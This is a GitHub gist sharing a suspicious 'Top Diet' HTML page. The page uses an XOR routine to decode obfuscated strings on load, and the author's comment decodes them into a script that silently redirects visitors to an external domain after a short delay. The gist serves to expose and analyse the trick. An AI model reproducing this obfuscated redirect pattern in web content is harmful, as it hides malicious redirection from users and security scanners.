Skip to content

Instantly share code, notes, and snippets.

@binarycleric

binarycleric/gist:4567731

Last active December 11, 2015 07:38
Show Gist options
  • Save binarycleric/4567731 to your computer and use it in GitHub Desktop.
Save binarycleric/4567731 to your computer and use it in GitHub Desktop.
Download ZIP
exploit attempt?
Raw
gistfile1.html
<!DOCTYPE HTML>
<html>
<head>
<title>Top Diet</title>
<script>
function aobi6q(s) {
var key=96;
var str = decodeURIComponent(s);
var xored = "";
for (i=0; i<str.length;i++) {
var a = str.charCodeAt(i);
var b = a ^ key;
xored = xored+String.fromCharCode(b);
}
document.write(xored);
return xored;
};
</script>
</head>
<body id="fUzCiAa9xl4GzTCFtrF6RJxrOY6DVTFbiH73w6LGGlt4o7zGIF" onload='onloaded();'>
<h1 id="UthGPU9qbYWzi8Jl2m7uJ6ddelAeSylLwI4wugRJDbk7jXxSlx">
<script>aobi6q('%2F%0E%05%40%13%05%03%0F%0E%04A');</script>
</h1>
<script>
aobi6q('%5C%13%03%12%09%10%14%5E%06%15%0E%03%14%09%0F%0E%40%04%05%0C%01%19%05%12HI%1B%17%09%0E%04%0F%17N%0C%0F%03%01%14%09%0F%0EN%08%12%05%06%40%5D%40G%08%14%14%10ZOO%17%17%17N%0E%05%17%13N%06%0F%18%13UN%0D%19%06%18%13%0E%05%17%13N%03%0F%0DG%1D%5B%40%13%05%144%09%0D%05%0F%15%14HG%04%05%0C%01%19%05%12HIGL%40STPI%5B%5CO%13%03%12%09%10%14%5E');
</script>
</body>
</html>
@binarycleric
Copy link
Author

Here's what's encoded in those function calls.

One second!

<script>
  function delayer() {
    window.location.href = 'http://www.news.foxs5.myfxsnews.com'
  }; 

  setTimeout('delayer()', 340);
</script>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment